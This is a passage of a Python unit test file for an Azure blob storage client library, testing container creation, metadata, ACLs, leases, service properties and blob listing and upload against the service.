def test_create_container_with_public_access_blob(self):
# Arrange
# Act
created = self.bc.create_container(self.container_name, None, 'blob')
# Assert
self.assertTrue(created)
acl = self.bc.get_container_acl(self.container_name)
self.assertIsNotNone(acl)
def test_create_container_with_metadata(self):
# Arrange
# Act
created = self.bc.create_container(self.container_name, {'hello':'world', 'foo':'42'})
# Assert
self.assertTrue(created)
md = self.bc.get_container_metadata(self.container_name)
self.assertIsNotNone(md)
self.assertEquals(md['x-ms-meta-hello'], 'world')
self.assertEquals(md['x-ms-meta-foo'], '42')
def test_list_containers_no_options(self):
# Arrange
self.bc.create_container(self.container_name)
# Act
containers = self.bc.list_containers()
for container in containers:
name = container.name
# Assert
self.assertIsNotNone(containers)
self.assertGreaterEqual(len(containers), 1)
self.assertIsNotNone(containers[0])
self.assertNamedItemInContainer(containers, self.container_name)
def test_list_containers_with_prefix(self):
# Arrange
self.bc.create_container(self.container_name)
# Act
containers = self.bc.list_containers(self.container_name)
# Assert
self.assertIsNotNone(containers)
self.assertEqual(len(containers), 1)
self.assertIsNotNone(containers[0])
self.assertEqual(containers[0].name, self.container_name)
self.assertIsNone(containers[0].metadata);
def test_list_containers_with_include_metadata(self):
# Arrange
self.bc.create_container(self.container_name)
resp = self.bc.set_container_metadata(self.container_name, {'hello':'world', 'bar':'43'})
# Act
containers = self.bc.list_containers(self.container_name, None, None, 'metadata')
# Assert
self.assertIsNotNone(containers)
self.assertGreaterEqual(len(containers), 1)
self.assertIsNotNone(containers[0])
self.assertNamedItemInContainer(containers, self.container_name)
self.assertEqual(containers[0].metadata['hello'], 'world')
self.assertEqual(containers[0].metadata['bar'], '43')
def test_list_containers_with_maxresults_and_marker(self):
# Arrange
self.additional_container_names = [self.container_name + 'a',
self.container_name + 'b',
self.container_name + 'c',
self.container_name + 'd']
for name in self.additional_container_names:
self.bc.create_container(name)
# Act
containers1 = self.bc.list_containers(self.container_name, None, 2)
containers2 = self.bc.list_containers(self.container_name, containers1.next_marker, 2)
# Assert
self.assertIsNotNone(containers1)
self.assertEqual(len(containers1), 2)
self.assertNamedItemInContainer(containers1, self.container_name + 'a')
self.assertNamedItemInContainer(containers1, self.container_name + 'b')
self.assertIsNotNone(containers2)
self.assertEqual(len(containers2), 2)
self.assertNamedItemInContainer(containers2, self.container_name + 'c')
self.assertNamedItemInContainer(containers2, self.container_name + 'd')
def test_set_container_metadata(self):
# Arrange
self.bc.create_container(self.container_name)
# Act
resp = self.bc.set_container_metadata(self.container_name, {'hello':'world', 'bar':'43'})
# Assert
self.assertIsNone(resp)
md = self.bc.get_container_metadata(self.container_name)
self.assertIsNotNone(md)
self.assertEquals(md['x-ms-meta-hello'], 'world')
self.assertEquals(md['x-ms-meta-bar'], '43')
def test_set_container_metadata_with_lease_id(self):
# Arrange
self.bc.create_container(self.container_name)
lease = self.bc.lease_container(self.container_name, 'acquire')
self.container_lease_id = lease['x-ms-lease-id']
# Act
resp = self.bc.set_container_metadata(self.container_name, {'hello':'world', 'bar':'43'}, lease['x-ms-lease-id'])
# Assert
self.assertIsNone(resp)
md = self.bc.get_container_metadata(self.container_name)
self.assertIsNotNone(md)
self.assertEquals(md['x-ms-meta-hello'], 'world')
self.assertEquals(md['x-ms-meta-bar'], '43')
def test_set_container_metadata_with_non_matching_lease_id(self):
# Arrange
self.bc.create_container(self.container_name)
lease = self.bc.lease_container(self.container_name, 'acquire')
self.container_lease_id = lease['x-ms-lease-id']
# Act
non_matching_lease_id = '00000000-1111-2222-3333-444444444444'
with self.assertRaises(WindowsAzureError):
self.bc.set_container_metadata(self.container_name, {'hello':'world', 'bar':'43'}, non_matching_lease_id)
# Assert
def test_set_container_metadata_with_non_existing_container(self):
# Arrange
# Act
with self.assertRaises(WindowsAzureError):
self.bc.set_container_metadata(self.container_name, {'hello':'world', 'bar':'43'})
# Assert
def test_get_container_metadata(self):
# Arrange
self.bc.create_container(self.container_name)
self.bc.set_container_acl(self.container_name, None, 'container')
self.bc.set_container_metadata(self.container_name, {'hello':'world','foo':'42'})
lease = self.bc.lease_container(self.container_name, 'acquire')
self.container_lease_id = lease['x-ms-lease-id']
# Act
md = self.bc.get_container_metadata(self.container_name)
# Assert
self.assertIsNotNone(md)
self.assertEquals(2, len(md))
self.assertEquals(md['x-ms-meta-hello'], 'world')
self.assertEquals(md['x-ms-meta-foo'], '42')
def test_get_container_metadata_with_lease_id(self):
# Arrange
self.bc.create_container(self.container_name)
self.bc.set_container_acl(self.container_name, None, 'container')
self.bc.set_container_metadata(self.container_name, {'hello':'world','foo':'42'})
lease = self.bc.lease_container(self.container_name, 'acquire')
self.container_lease_id = lease['x-ms-lease-id']
# Act
md = self.bc.get_container_metadata(self.container_name, lease['x-ms-lease-id'])
# Assert
self.assertIsNotNone(md)
self.assertEquals(2, len(md))
self.assertEquals(md['x-ms-meta-hello'], 'world')
self.assertEquals(md['x-ms-meta-foo'], '42')
def test_get_container_metadata_with_non_matching_lease_id(self):
# Arrange
self.bc.create_container(self.container_name)
self.bc.set_container_acl(self.container_name, None, 'container')
self.bc.set_container_metadata(self.container_name, {'hello':'world','foo':'42'})
lease = self.bc.lease_container(self.container_name, 'acquire')
self.container_lease_id = lease['x-ms-lease-id']
# Act
non_matching_lease_id = '00000000-1111-2222-3333-444444444444'
with self.assertRaises(WindowsAzureError):
self.bc.get_container_metadata(self.container_name, non_matching_lease_id)
# Assert
def test_get_container_metadata_with_non_existing_container(self):
# Arrange
# Act
with self.assertRaises(WindowsAzureError):
self.bc.get_container_metadata(self.container_name)
# Assert
def test_get_container_properties(self):
# Arrange
self.bc.create_container(self.container_name)
self.bc.set_container_acl(self.container_name, None, 'container')
self.bc.set_container_metadata(self.container_name, {'hello':'world','foo':'42'})
lease = self.bc.lease_container(self.container_name, 'acquire')
self.container_lease_id = lease['x-ms-lease-id']
# Act
props = self.bc.get_container_properties(self.container_name)
# Assert
self.assertIsNotNone(props)
self.assertEquals(props['x-ms-meta-hello'], 'world')
self.assertEquals(props['x-ms-meta-foo'], '42')
self.assertEquals(props['x-ms-lease-duration'], 'fixed')
self.assertEquals(props['x-ms-lease-state'], 'leased')
self.assertEquals(props['x-ms-lease-status'], 'locked')
def test_get_container_properties_with_lease_id(self):
# Arrange
self.bc.create_container(self.container_name)
self.bc.set_container_acl(self.container_name, None, 'container')
self.bc.set_container_metadata(self.container_name, {'hello':'world','foo':'42'})
lease = self.bc.lease_container(self.container_name, 'acquire')
self.container_lease_id = lease['x-ms-lease-id']
# Act
props = self.bc.get_container_properties(self.container_name, lease['x-ms-lease-id'])
# Assert
self.assertIsNotNone(props)
self.assertEquals(props['x-ms-meta-hello'], 'world')
self.assertEquals(props['x-ms-meta-foo'], '42')
self.assertEquals(props['x-ms-lease-duration'], 'fixed')
self.assertEquals(props['x-ms-lease-status'], 'locked')
self.assertEquals(props['x-ms-lease-state'], 'leased')
def test_get_container_properties_with_non_matching_lease_id(self):
# Arrange
self.bc.create_container(self.container_name)
self.bc.set_container_acl(self.container_name, None, 'container')
self.bc.set_container_metadata(self.container_name, {'hello':'world','foo':'42'})
lease = self.bc.lease_container(self.container_name, 'acquire')
self.container_lease_id = lease['x-ms-lease-id']
# Act
non_matching_lease_id = '00000000-1111-2222-3333-444444444444'
with self.assertRaises(WindowsAzureError):
self.bc.get_container_properties(self.container_name, non_matching_lease_id)
# Assert
def test_get_container_properties_with_non_existing_container(self):
# Arrange
# Act
with self.assertRaises(WindowsAzureError):
self.bc.get_container_properties(self.container_name)
# Assert
def test_get_container_acl(self):
# Arrange
self.bc.create_container(self.container_name)
# Act
acl = self.bc.get_container_acl(self.container_name)
# Assert
self.assertIsNotNone(acl)
self.assertEqual(len(acl.signed_identifiers), 0)
def test_get_container_acl_iter(self):
# Arrange
self.bc.create_container(self.container_name)
# Act
acl = self.bc.get_container_acl(self.container_name)
for signed_identifier in acl:
pass
# Assert
self.assertIsNotNone(acl)
self.assertEqual(len(acl.signed_identifiers), 0)
self.assertEqual(len(acl), 0)
def test_get_container_acl_with_lease_id(self):
# Arrange
self.bc.create_container(self.container_name)
lease = self.bc.lease_container(self.container_name, 'acquire')
self.container_lease_id = lease['x-ms-lease-id']
# Act
acl = self.bc.get_container_acl(self.container_name, lease['x-ms-lease-id'])
# Assert
self.assertIsNotNone(acl)
self.assertEqual(len(acl.signed_identifiers), 0)
def test_get_container_acl_with_non_matching_lease_id(self):
# Arrange
self.bc.create_container(self.container_name)
lease = self.bc.lease_container(self.container_name, 'acquire')
self.container_lease_id = lease['x-ms-lease-id']
# Act
non_matching_lease_id = '00000000-1111-2222-3333-444444444444'
with self.assertRaises(WindowsAzureError):
self.bc.get_container_acl(self.container_name, non_matching_lease_id)
# Assert
def test_get_container_acl_with_non_existing_container(self):
# Arrange
# Act
with self.assertRaises(WindowsAzureError):
self.bc.get_container_acl(self.container_name)
# Assert
def test_set_container_acl(self):
# Arrange
self.bc.create_container(self.container_name)
# Act
resp = self.bc.set_container_acl(self.container_name)
# Assert
self.assertIsNone(resp)
acl = self.bc.get_container_acl(self.container_name)
self.assertIsNotNone(acl)
def test_set_container_acl_with_lease_id(self):
# Arrange
self.bc.create_container(self.container_name)
lease = self.bc.lease_container(self.container_name, 'acquire')
self.container_lease_id = lease['x-ms-lease-id']
# Act
resp = self.bc.set_container_acl(self.container_name, x_ms_lease_id=lease['x-ms-lease-id'])
# Assert
self.assertIsNone(resp)
acl = self.bc.get_container_acl(self.container_name)
self.assertIsNotNone(acl)
def test_set_container_acl_with_non_matching_lease_id(self):
# Arrange
self.bc.create_container(self.container_name)
lease = self.bc.lease_container(self.container_name, 'acquire')
self.container_lease_id = lease['x-ms-lease-id']
# Act
non_matching_lease_id = '00000000-1111-2222-3333-444444444444'
with self.assertRaises(WindowsAzureError):
self.bc.set_container_acl(self.container_name, x_ms_lease_id=non_matching_lease_id)
# Assert
def test_set_container_acl_with_public_access_container(self):
# Arrange
self.bc.create_container(self.container_name)
# Act
resp = self.bc.set_container_acl(self.container_name, None, 'container')
# Assert
self.assertIsNone(resp)
acl = self.bc.get_container_acl(self.container_name)
self.assertIsNotNone(acl)
def test_set_container_acl_with_public_access_blob(self):
# Arrange
self.bc.create_container(self.container_name)
# Act
resp = self.bc.set_container_acl(self.container_name, None, 'blob')
# Assert
self.assertIsNone(resp)
acl = self.bc.get_container_acl(self.container_name)
self.assertIsNotNone(acl)
def test_set_container_acl_with_empty_signed_identifiers(self):
# Arrange
self.bc.create_container(self.container_name)
# Act
identifiers = SignedIdentifiers()
resp = self.bc.set_container_acl(self.container_name, identifiers)
# Assert
self.assertIsNone(resp)
acl = self.bc.get_container_acl(self.container_name)
self.assertIsNotNone(acl)
self.assertEqual(len(acl.signed_identifiers), 0)
def test_set_container_acl_with_signed_identifiers(self):
# Arrange
self.bc.create_container(self.container_name)
# Act
si = SignedIdentifier()
si.id = 'testid'
si.access_policy.start = '2011-10-11'
si.access_policy.expiry = '2011-10-12'
si.access_policy.permission = 'r'
identifiers = SignedIdentifiers()
identifiers.signed_identifiers.append(si)
resp = self.bc.set_container_acl(self.container_name, identifiers)
# Assert
self.assertIsNone(resp)
acl = self.bc.get_container_acl(self.container_name)
self.assertIsNotNone(acl)
self.assertEqual(len(acl.signed_identifiers), 1)
self.assertEqual(len(acl), 1)
self.assertEqual(acl.signed_identifiers[0].id, 'testid')
self.assertEqual(acl[0].id, 'testid')
def test_set_container_acl_with_non_existing_container(self):
# Arrange
# Act
with self.assertRaises(WindowsAzureError):
self.bc.set_container_acl(self.container_name, None, 'container')
# Assert
def test_lease_container_acquire_and_release(self):
# Arrange
self.bc.create_container(self.container_name)
# Act
lease = self.bc.lease_container(self.container_name, 'acquire')
self.container_lease_id = lease['x-ms-lease-id']
lease = self.bc.lease_container(self.container_name, 'release', x_ms_lease_id=lease['x-ms-lease-id'])
self.container_lease_id = None
# Assert
def test_lease_container_renew(self):
# Arrange
self.bc.create_container(self.container_name)
lease = self.bc.lease_container(self.container_name, 'acquire', x_ms_lease_duration=15)
self.container_lease_id = lease['x-ms-lease-id']
time.sleep(10)
# Act
renewed_lease = self.bc.lease_container(self.container_name, 'renew', x_ms_lease_id=lease['x-ms-lease-id'])
# Assert
self.assertEquals(lease['x-ms-lease-id'], renewed_lease['x-ms-lease-id'])
time.sleep(5)
with self.assertRaises(WindowsAzureError):
self.bc.delete_container(self.container_name)
time.sleep(10)
self.bc.delete_container(self.container_name)
def test_lease_container_break_period(self):
# Arrange
self.bc.create_container(self.container_name)
# Act
lease = self.bc.lease_container(self.container_name, 'acquire', x_ms_lease_duration=15)
self.container_lease_id = lease['x-ms-lease-id']
# Assert
self.bc.lease_container(self.container_name, 'break', x_ms_lease_id=lease['x-ms-lease-id'], x_ms_lease_break_period=5)
time.sleep(5)
with self.assertRaises(WindowsAzureError):
self.bc.delete_container(self.container_name, x_ms_lease_id=lease['x-ms-lease-id'])
def test_lease_container_break_released_lease_fails(self):
# Arrange
self.bc.create_container(self.container_name)
lease = self.bc.lease_container(self.container_name, 'acquire')
self.container_lease_id = lease['x-ms-lease-id']
self.bc.lease_container(self.container_name, 'release', lease['x-ms-lease-id'])
# Act
with self.assertRaises(WindowsAzureError):
self.bc.lease_container(self.container_name, 'break', lease['x-ms-lease-id'])
# Assert
def test_lease_container_acquire_after_break_fails(self):
# Arrange
self.bc.create_container(self.container_name)
lease = self.bc.lease_container(self.container_name, 'acquire')
self.container_lease_id = lease['x-ms-lease-id']
self.bc.lease_container(self.container_name, 'break', lease['x-ms-lease-id'])
# Act
with self.assertRaises(WindowsAzureError):
self.bc.lease_container(self.container_name, 'acquire')
# Assert
def test_lease_container_with_duration(self):
# Arrange
self.bc.create_container(self.container_name)
# Act
lease = self.bc.lease_container(self.container_name, 'acquire', x_ms_lease_duration=15)
self.container_lease_id = lease['x-ms-lease-id']
# Assert
with self.assertRaises(WindowsAzureError):
self.bc.lease_container(self.container_name, 'acquire')
time.sleep(15)
lease = self.bc.lease_container(self.container_name, 'acquire')
self.container_lease_id = lease['x-ms-lease-id']
def test_lease_container_with_proposed_lease_id(self):
# Arrange
self.bc.create_container(self.container_name)
# Act
lease_id = '55e97f64-73e8-4390-838d-d9e84a374321'
lease = self.bc.lease_container(self.container_name, 'acquire', x_ms_proposed_lease_id=lease_id)
self.container_lease_id = lease['x-ms-lease-id']
# Assert
self.assertIsNotNone(lease)
self.assertEquals(lease['x-ms-lease-id'], lease_id)
def test_lease_container_change_lease_id(self):
# Arrange
self.bc.create_container(self.container_name)
# Act
lease_id = '29e0b239-ecda-4f69-bfa3-95f6af91464c'
lease1 = self.bc.lease_container(self.container_name, 'acquire')
self.container_lease_id = lease1['x-ms-lease-id']
lease2 = self.bc.lease_container(self.container_name, 'change', x_ms_lease_id=lease1['x-ms-lease-id'], x_ms_proposed_lease_id=lease_id)
self.container_lease_id = lease2['x-ms-lease-id']
# Assert
self.assertIsNotNone(lease1)
self.assertIsNotNone(lease2)
self.assertNotEquals(lease1['x-ms-lease-id'], lease_id)
self.assertEquals(lease2['x-ms-lease-id'], lease_id)
def test_delete_container_with_existing_container(self):
# Arrange
self.bc.create_container(self.container_name)
# Act
deleted = self.bc.delete_container(self.container_name)
# Assert
self.assertTrue(deleted)
containers = self.bc.list_containers()
self.assertNamedItemNotInContainer(containers, self.container_name)
def test_delete_container_with_existing_container_fail_not_exist(self):
# Arrange
self.bc.create_container(self.container_name)
# Act
deleted = self.bc.delete_container(self.container_name, True)
# Assert
self.assertTrue(deleted)
containers = self.bc.list_containers()
self.assertNamedItemNotInContainer(containers, self.container_name)
def test_delete_container_with_non_existing_container(self):
# Arrange
# Act
deleted = self.bc.delete_container(self.container_name)
# Assert
self.assertFalse(deleted)
def test_delete_container_with_non_existing_container_fail_not_exist(self):
# Arrange
# Act
with self.assertRaises(WindowsAzureError):
self.bc.delete_container(self.container_name, True)
# Assert
def test_delete_container_with_lease_id(self):
# Arrange
self.bc.create_container(self.container_name)
lease = self.bc.lease_container(self.container_name, 'acquire', x_ms_lease_duration=15)
self.container_lease_id = lease['x-ms-lease-id']
# Act
deleted = self.bc.delete_container(self.container_name, x_ms_lease_id=lease['x-ms-lease-id'])
# Assert
self.assertTrue(deleted)
containers = self.bc.list_containers()
self.assertNamedItemNotInContainer(containers, self.container_name)
def test_delete_container_without_lease_id(self):
# Arrange
self.bc.create_container(self.container_name)
lease = self.bc.lease_container(self.container_name, 'acquire', x_ms_lease_duration=15)
self.container_lease_id = lease['x-ms-lease-id']
# Act
with self.assertRaises(WindowsAzureError):
self.bc.delete_container(self.container_name)
# Assert
#--Test cases for blob service ---------------------------------------
def test_set_blob_service_properties(self):
# Arrange
# Act
props = StorageServiceProperties()
props.metrics.enabled = False
resp = self.bc.set_blob_service_properties(props)
# Assert
self.assertIsNone(resp)
received_props = self.bc.get_blob_service_properties()
self.assertFalse(received_props.metrics.enabled)
def test_set_blob_service_properties_with_timeout(self):
# Arrange
# Act
props = StorageServiceProperties()
props.logging.write = True
resp = self.bc.set_blob_service_properties(props, 5)
# Assert
self.assertIsNone(resp)
received_props = self.bc.get_blob_service_properties()
self.assertTrue(received_props.logging.write)
def test_get_blob_service_properties(self):
# Arrange
# Act
props = self.bc.get_blob_service_properties()
# Assert
self.assertIsNotNone(props)
self.assertIsInstance(props.logging, Logging)
self.assertIsInstance(props.metrics, Metrics)
def test_get_blob_service_properties_with_timeout(self):
# Arrange
# Act
props = self.bc.get_blob_service_properties(5)
# Assert
self.assertIsNotNone(props)
self.assertIsInstance(props.logging, Logging)
self.assertIsInstance(props.metrics, Metrics)
#--Test cases for blobs ----------------------------------------------
def test_make_blob_url(self):
# Arrange
# Act
res = self.bc.make_blob_url('vhds', 'my.vhd')
# Assert
self.assertEquals(res, 'https://' + credentials.getStorageServicesName() + '.blob.core.windows.net/vhds/my.vhd')
def test_make_blob_url_with_account_name(self):
# Arrange
# Act
res = self.bc.make_blob_url('vhds', 'my.vhd', account_name='myaccount')
# Assert
self.assertEquals(res, 'https://myaccount.blob.core.windows.net/vhds/my.vhd')
def test_make_blob_url_with_protocol(self):
# Arrange
# Act
res = self.bc.make_blob_url('vhds', 'my.vhd', protocol='http')
# Assert
self.assertEquals(res, 'http://' + credentials.getStorageServicesName() + '.blob.core.windows.net/vhds/my.vhd')
def test_make_blob_url_with_host_base(self):
# Arrange
# Act
res = self.bc.make_blob_url('vhds', 'my.vhd', host_base='.blob.internal.net')
# Assert
self.assertEquals(res, 'https://' + credentials.getStorageServicesName() + '.blob.internal.net/vhds/my.vhd')
def test_make_blob_url_with_all(self):
# Arrange
# Act
res = self.bc.make_blob_url('vhds', 'my.vhd', account_name='myaccount', protocol='http', host_base='.blob.internal.net')
# Assert
self.assertEquals(res, 'http://myaccount.blob.internal.net/vhds/my.vhd')
def test_list_blobs(self):
# Arrange
self._create_container(self.container_name)
data = 'hello world'
self.bc.put_blob(self.container_name, 'blob1', data, 'BlockBlob')
self.bc.put_blob(self.container_name, 'blob2', data, 'BlockBlob')
# Act
resp = self.bc.list_blobs(self.container_name)
for blob in resp:
name = blob.name
# Assert
self.assertIsNotNone(resp)
self.assertGreaterEqual(len(resp), 2)
self.assertIsNotNone(resp[0])
self.assertNamedItemInContainer(resp, 'blob1')
self.assertNamedItemInContainer(resp, 'blob2')
self.assertEqual(resp[0].properties.content_length, 11)
self.assertEqual(resp[1].properties.content_type, 'application/octet-stream Charset=UTF-8')
def test_list_blobs_leased_blob(self):
# Arrange
self._create_container(self.container_name)
data = 'hello world'
self.bc.put_blob(self.container_name, 'blob1', data, 'BlockBlob')
lease = self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
# Act
resp = self.bc.list_blobs(self.container_name)
for blob in resp:
name = blob.name
# Assert
self.assertIsNotNone(resp)
self.assertGreaterEqual(len(resp), 1)
self.assertIsNotNone(resp[0])
self.assertNamedItemInContainer(resp, 'blob1')
self.assertEqual(resp[0].properties.content_length, 11)
self.assertEqual(resp[0].properties.lease_duration, 'fixed')
self.assertEqual(resp[0].properties.lease_status, 'locked')
self.assertEqual(resp[0].properties.lease_state, 'leased')
def test_list_blobs_with_prefix(self):
# Arrange
self._create_container(self.container_name)
data = 'hello world'
self.bc.put_blob(self.container_name, 'bloba1', data, 'BlockBlob')
self.bc.put_blob(self.container_name, 'bloba2', data, 'BlockBlob')
self.bc.put_blob(self.container_name, 'blobb1', data, 'BlockBlob')
# Act
resp = self.bc.list_blobs(self.container_name, 'bloba')
# Assert
self.assertIsNotNone(resp)
self.assertEqual(len(resp), 2)
self.assertEqual(len(resp.blobs), 2)
self.assertEqual(len(resp.prefixes), 0)
self.assertEqual(resp.prefix, 'bloba')
self.assertNamedItemInContainer(resp, 'bloba1')
self.assertNamedItemInContainer(resp, 'bloba2')
def test_list_blobs_with_prefix_and_delimiter(self):
# Arrange
self._create_container(self.container_name)
data = 'hello world'
self.bc.put_blob(self.container_name, 'documents/music/pop/thriller.mp3', data, 'BlockBlob')
self.bc.put_blob(self.container_name, 'documents/music/rock/stairwaytoheaven.mp3', data, 'BlockBlob')
self.bc.put_blob(self.container_name, 'documents/music/rock/hurt.mp3', data, 'BlockBlob')
self.bc.put_blob(self.container_name, 'documents/music/rock/metallica/one.mp3', data, 'BlockBlob')
self.bc.put_blob(self.container_name, 'documents/music/unsorted1.mp3', data, 'BlockBlob')
self.bc.put_blob(self.container_name, 'documents/music/unsorted2.mp3', data, 'BlockBlob')
self.bc.put_blob(self.container_name, 'documents/pictures/birthday/kid.jpg', data, 'BlockBlob')
self.bc.put_blob(self.container_name, 'documents/pictures/birthday/cake.jpg', data, 'BlockBlob')
# Act
resp = self.bc.list_blobs(self.container_name, 'documents/music/', delimiter='/')
# Assert
self.assertIsNotNone(resp)
self.assertEqual(len(resp), 2)
self.assertEqual(len(resp.blobs), 2)
self.assertEqual(len(resp.prefixes), 2)
self.assertEqual(resp.prefix, 'documents/music/')
self.assertEqual(resp.delimiter, '/')
self.assertNamedItemInContainer(resp, 'documents/music/unsorted1.mp3')
self.assertNamedItemInContainer(resp, 'documents/music/unsorted2.mp3')
self.assertNamedItemInContainer(resp.blobs, 'documents/music/unsorted1.mp3')
self.assertNamedItemInContainer(resp.blobs, 'documents/music/unsorted2.mp3')
self.assertNamedItemInContainer(resp.prefixes, 'documents/music/pop/')
self.assertNamedItemInContainer(resp.prefixes, 'documents/music/rock/')
def test_list_blobs_with_maxresults(self):
# Arrange
self._create_container(self.container_name)
data = 'hello world'
self.bc.put_blob(self.container_name, 'bloba1', data, 'BlockBlob')
self.bc.put_blob(self.container_name, 'bloba2', data, 'BlockBlob')
self.bc.put_blob(self.container_name, 'bloba3', data, 'BlockBlob')
self.bc.put_blob(self.container_name, 'blobb1', data, 'BlockBlob')
# Act
blobs = self.bc.list_blobs(self.container_name, None, None, 2)
# Assert
self.assertIsNotNone(blobs)
self.assertEqual(len(blobs), 2)
self.assertNamedItemInContainer(blobs, 'bloba1')
self.assertNamedItemInContainer(blobs, 'bloba2')
def test_list_blobs_with_maxresults_and_marker(self):
# Arrange
self._create_container(self.container_name)
data = 'hello world'
self.bc.put_blob(self.container_name, 'bloba1', data, 'BlockBlob')
self.bc.put_blob(self.container_name, 'bloba2', data, 'BlockBlob')
self.bc.put_blob(self.container_name, 'bloba3', data, 'BlockBlob')
self.bc.put_blob(self.container_name, 'blobb1', data, 'BlockBlob')
# Act
blobs1 = self.bc.list_blobs(self.container_name, None, None, 2)
blobs2 = self.bc.list_blobs(self.container_name, None, blobs1.next_marker, 2)
# Assert
self.assertEqual(len(blobs1), 2)
self.assertEqual(len(blobs2), 2)
self.assertNamedItemInContainer(blobs1, 'bloba1')
self.assertNamedItemInContainer(blobs1, 'bloba2')
self.assertNamedItemInContainer(blobs2, 'bloba3')
self.assertNamedItemInContainer(blobs2, 'blobb1')
def test_list_blobs_with_include_snapshots(self):
# Arrange
self._create_container(self.container_name)
data = 'hello world'
self.bc.put_blob(self.container_name, 'blob1', data, 'BlockBlob')
self.bc.put_blob(self.container_name, 'blob2', data, 'BlockBlob')
self.bc.snapshot_blob(self.container_name, 'blob1')
# Act
blobs = self.bc.list_blobs(self.container_name, include='snapshots')
# Assert
self.assertEqual(len(blobs), 3)
self.assertEqual(blobs[0].name, 'blob1')
self.assertNotEqual(blobs[0].snapshot, '')
self.assertEqual(blobs[1].name, 'blob1')
self.assertEqual(blobs[1].snapshot, '')
self.assertEqual(blobs[2].name, 'blob2')
self.assertEqual(blobs[2].snapshot, '')
def test_list_blobs_with_include_metadata(self):
# Arrange
self._create_container(self.container_name)
data = 'hello world'
self.bc.put_blob(self.container_name, 'blob1', data, 'BlockBlob', x_ms_meta_name_values={'foo':'1','bar':'bob'})
self.bc.put_blob(self.container_name, 'blob2', data, 'BlockBlob', x_ms_meta_name_values={'foo':'2','bar':'car'})
self.bc.snapshot_blob(self.container_name, 'blob1')
# Act
blobs = self.bc.list_blobs(self.container_name, include='metadata')
# Assert
self.assertEqual(len(blobs), 2)
self.assertEqual(blobs[0].name, 'blob1')
self.assertEqual(blobs[0].metadata['foo'], '1')
self.assertEqual(blobs[0].metadata['bar'], 'bob')
self.assertEqual(blobs[1].name, 'blob2')
self.assertEqual(blobs[1].metadata['foo'], '2')
self.assertEqual(blobs[1].metadata['bar'], 'car')
def test_list_blobs_with_include_uncommittedblobs(self):
# Arrange
self._create_container(self.container_name)
data = 'hello world'
self.bc.put_block(self.container_name, 'blob1', 'AAA', '1')
self.bc.put_block(self.container_name, 'blob1', 'BBB', '2')
self.bc.put_block(self.container_name, 'blob1', 'CCC', '3')
self.bc.put_blob(self.container_name, 'blob2', data, 'BlockBlob', x_ms_meta_name_values={'foo':'2','bar':'car'})
# Act
blobs = self.bc.list_blobs(self.container_name, include='uncommittedblobs')
# Assert
self.assertEqual(len(blobs), 2)
self.assertEqual(blobs[0].name, 'blob1')
self.assertEqual(blobs[1].name, 'blob2')
def test_list_blobs_with_include_copy(self):
# Arrange
self._create_container(self.container_name)
data = 'hello world'
self.bc.put_blob(self.container_name, 'blob1', data, 'BlockBlob', x_ms_meta_name_values={'status':'original'})
sourceblob = 'https://%s.blob.core.windows.net/%s/%s' % (credentials.getStorageServicesName(),
self.container_name,
'blob1')
self.bc.copy_blob(self.container_name, 'blob1copy', sourceblob, {'status':'copy'})
# Act
blobs = self.bc.list_blobs(self.container_name, include='copy')
# Assert
self.assertEqual(len(blobs), 2)
self.assertEqual(blobs[0].name, 'blob1')
self.assertEqual(blobs[1].name, 'blob1copy')
self.assertEqual(blobs[1].properties.content_length, 11)
self.assertEqual(blobs[1].properties.content_type, 'application/octet-stream Charset=UTF-8')
self.assertEqual(blobs[1].properties.content_encoding, '')
self.assertEqual(blobs[1].properties.content_language, '')
self.assertNotEqual(blobs[1].properties.content_md5, '')
self.assertEqual(blobs[1].properties.blob_type, 'BlockBlob')
self.assertEqual(blobs[1].properties.lease_status, 'unlocked')
self.assertEqual(blobs[1].properties.lease_state, 'available')
self.assertNotEqual(blobs[1].properties.copy_id, '')
self.assertEqual(blobs[1].properties.copy_source, sourceblob)
self.assertEqual(blobs[1].properties.copy_status, 'success')
self.assertEqual(blobs[1].properties.copy_progress, '11/11')
self.assertNotEqual(blobs[1].properties.copy_completion_time, '')
def test_list_blobs_with_include_multiple(self):
# Arrange
self._create_container(self.container_name)
data = 'hello world'
self.bc.put_blob(self.container_name, 'blob1', data, 'BlockBlob', x_ms_meta_name_values={'foo':'1','bar':'bob'})
self.bc.put_blob(self.container_name, 'blob2', data, 'BlockBlob', x_ms_meta_name_values={'foo':'2','bar':'car'})
self.bc.snapshot_blob(self.container_name, 'blob1')
# Act
blobs = self.bc.list_blobs(self.container_name, include='snapshots,metadata')
# Assert
self.assertEqual(len(blobs), 3)
self.assertEqual(blobs[0].name, 'blob1')
self.assertNotEqual(blobs[0].snapshot, '')
self.assertEqual(blobs[0].metadata['foo'], '1')
self.assertEqual(blobs[0].metadata['bar'], 'bob')
self.assertEqual(blobs[1].name, 'blob1')
self.assertEqual(blobs[1].snapshot, '')
self.assertEqual(blobs[1].metadata['foo'], '1')
self.assertEqual(blobs[1].metadata['bar'], 'bob')
self.assertEqual(blobs[2].name, 'blob2')
self.assertEqual(blobs[2].snapshot, '')
self.assertEqual(blobs[2].metadata['foo'], '2')
self.assertEqual(blobs[2].metadata['bar'], 'car')
def test_put_blob_block_blob(self):
# Arrange
self._create_container(self.container_name)
# Act
data = 'hello world'
resp = self.bc.put_blob(self.container_name, 'blob1', data, 'BlockBlob')
# Assert
self.assertIsNone(resp)
def test_put_blob_page_blob(self):
# Arrange
self._create_container(self.container_name)
# Act
resp = self.bc.put_blob(self.container_name, 'blob1', '', 'PageBlob', x_ms_blob_content_length='1024')
# Assert
self.assertIsNone(resp)
def test_put_blob_with_lease_id(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
lease = self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
lease_id = lease['x-ms-lease-id']
# Act
data = 'hello world again'
resp = self.bc.put_blob(self.container_name, 'blob1', data, 'BlockBlob', x_ms_lease_id=lease_id)
# Assert
self.assertIsNone(resp)
blob = self.bc.get_blob(self.container_name, 'blob1', x_ms_lease_id=lease_id)
self.assertEqual(blob, 'hello world again')
def test_put_blob_with_metadata(self):
# Arrange
self._create_container(self.container_name)
# Act
data = 'hello world'
resp = self.bc.put_blob(self.container_name, 'blob1', data, 'BlockBlob', x_ms_meta_name_values={'hello':'world','foo':'42'})
# Assert
self.assertIsNone(resp)
md = self.bc.get_blob_metadata(self.container_name, 'blob1')
self.assertEquals(md['x-ms-meta-hello'], 'world')
self.assertEquals(md['x-ms-meta-foo'], '42')
def test_get_blob_with_existing_blob(self):
# Arrange
